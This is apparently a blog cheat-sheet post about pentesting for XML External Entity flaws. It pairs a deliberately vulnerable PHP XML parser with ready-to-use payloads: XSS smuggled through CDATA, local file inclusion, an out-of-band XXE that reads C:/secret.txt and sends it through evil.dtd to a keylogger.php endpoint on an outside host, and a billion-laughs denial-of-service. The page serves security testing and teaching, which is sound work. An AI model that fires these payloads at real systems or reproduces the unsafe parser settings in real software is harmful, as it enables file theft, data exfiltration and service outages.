Penetration Testing with OWASP Top 10 - 2017 A4 XML External Entities (XXE)

Proof Of Concept

if (isset($_GET["submit"])){
 $xml = $_GET["xml"];
 libxml_disable_entity_loader(false);

 $dom = new DOMDocument();
 $dom->resolveExternals = true;
 $dom->substituteEntities = true;
 $dom->preserveWhiteSpace = true;
 $dom->loadXML($xml, LIBXML_NOENT);
 echo $dom->textContent;
}

Manual Exploitation

Cross-site Scripting

<test><![CDATA[<]]>script<![CDATA[>]]>alert('XSS')<![CDATA[<]]>/script<![CDATA[>]]></test>

File Inclusion

<!DOCTYPE change-log [
 <!ENTITY systemEntity SYSTEM "file.txt">
]>

<change-log>
 <text>&systemEntity;</text>
</change-log>

Out-of-band XML External Entity (OOB-XXE)

<!DOCTYPE change-log [
<!ENTITY % file SYSTEM "file:///C:/secret.txt" >
<!ENTITY % data SYSTEM "http://192.168.231.1/vulnerable/xml/oob/evil.dtd">
%data;
]>

<change-log>
<text>&send;</text>
</change-log>

Content of evil.dtd:

<!ENTITY % all "<!ENTITY send SYSTEM 'http://192.168.231.1/keylogger/keylogger.php?c=%file;'>"> %all;

Content of file:///C:/secret.txt captured

Billion laughs attack

<!DOCTYPE lolz [
  <!ENTITY lol "lol ">
  <!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;">
  <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;">
 ]>
<lolz>&lol3;</lolz>

Search This Blog

Gary's Cybersecurity Cheat Sheets

Penetration Testing with OWASP Top 10 - 2017 A4 XML External Entities (XXE)

Proof Of Concept

Manual Exploitation

Popular posts from this blog

Remote Desktop Protocol (RDP) Security

Penetration Testing - Network

Damn Vulnerable Web Services (DVWS) - Walkthrough

Offensive Security Testing Guide

Server Message Block (SMB) Security

Host Configuration Assessment - Windows